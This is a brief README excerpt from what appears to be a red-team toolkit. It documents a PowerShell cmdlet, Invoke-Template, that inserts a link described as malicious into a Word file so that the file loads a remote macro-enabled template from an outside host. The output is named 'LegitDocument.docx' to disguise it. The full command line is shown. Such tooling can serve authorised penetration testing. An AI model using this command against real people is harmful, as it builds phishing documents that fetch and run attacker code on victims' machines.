nickvourd/RTI-Toolkit/README.md

 If you use `Invoke-Template` cmdlet you can insert a malicious link within this docx:

+⚠️ Before running `Invoke-Template`, please make sure to save the document and close it (terminate its process).

 ```
 Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx
 ```